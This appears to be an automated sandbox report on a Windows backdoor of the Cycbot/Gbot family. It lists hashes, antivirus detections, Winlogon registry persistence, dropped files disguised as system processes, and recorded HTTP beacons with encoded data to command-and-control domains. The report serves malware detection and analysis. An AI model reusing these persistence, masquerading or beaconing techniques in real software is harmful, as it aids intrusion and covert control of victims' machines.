Analysis Date: 2014-12-17 22:18:30
MD5: 0a60689e923c25ac2565928669e40826
SHA1: e7d4090ac5b4b12db3f6a89c91d27078802afc05

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: b36323d4fde6ddecf78c1bee5ef6fe09 sha1: 92a0f08325b6cb955d0ed534e9ed40710eb4bc4d size: 115200
Section: .rdata md5: f68891f4b028a24dddad01209547dce3 sha1: 1203c0c4d370156cff0f1295d67dcce91af3d57d size: 1536
Section: .data md5: 7eb434bb9a88d54588dd191d02405111 sha1: 8690072a48ae66d6d5dfd9bc3fbf40899965aa7c size: 68608
Section: .reloc md5: 78131b8265419cd19923de34e4d59e94 sha1: 26723ba7d07abe1c716ab21a2fef9b99952e1940 size: 1024
Timestamp: 2005-10-02 05:51:49
PEhash: f4229382f692e5af0c97363ac0fdd4caf0ababa6
IMPhash: 6597540d6fb824b27a61c2f955b6bb18
AV: 360 Safe | Gen:Variant.Kazy.38139
AV: Ad-Aware | Gen:Variant.Kazy.38139
AV: Alwil (avast) | Cybota [Trj]
AV: Arcabit (arcavir) | Gen:Variant.Kazy.38139
AV: Authentium | W32/Goolbot.K.gen!Eldorado
AV: Avira (antivir) | TR/Crypt.ZPACK.Gen
AV: BullGuard | Gen:Variant.Kazy.38139
AV: CA (E-Trust Ino) | Win32/Cycbot.G!generic
AV: CAT (quickheal) | Backdoor.Cycbot.B
AV: ClamAV | Trojan.Gbot-470
AV: Dr. Web | Trojan.DownLoader4.61209
AV: Emsisoft | Gen:Variant.Kazy.38139
AV: Eset (nod32) | Win32/Kryptik.SZU
AV: Fortinet | W32/Gbot.IS!tr.bdr
AV: Frisk (f-prot) | W32/Goolbot.K.gen!Eldorado
AV: F-Secure | Gen:Variant.Kazy.38139
AV: Grisoft (avg) | Win32/Cryptor
AV: Ikarus | Virus.Win32.Cryptor
AV: K7 | Backdoor ( 003210941 )
AV: Kaspersky | Backdoor.Win32.Gbot.oho
AV: MalwareBytes | Backdoor.Bot
AV: Mcafee | BackDoor-EXI.gen.r
AV: Microsoft Security Essentials | Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan) | Gen:Variant.Kazy.38139
AV: Rising | no_virus
AV: Sophos | Mal/FakeAV-IS
AV: Symantec | Backdoor.Trojan
AV: Trend Micro | BKDR_CYCBOT.SME3
AV: VirusBlokAda (vba32) | Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: 127.0.0.1
Winsock DNS: yourmediaresources.com
Winsock DNS: crazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: crazyleafdesign.com
Type: A
199.201.88.112
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: yourmediaresources.com
Type: A
HTTP GET: http://crazyleafdesign.com/blog/images/share/stumble.png?v25=82&tq=gJ4WK%2FSUh4TDhRMw9YLJiMSTUivqg4aExZNSK%2B%2FbxWq1SfkIYXB6
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 199.201.88.112:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap

Strings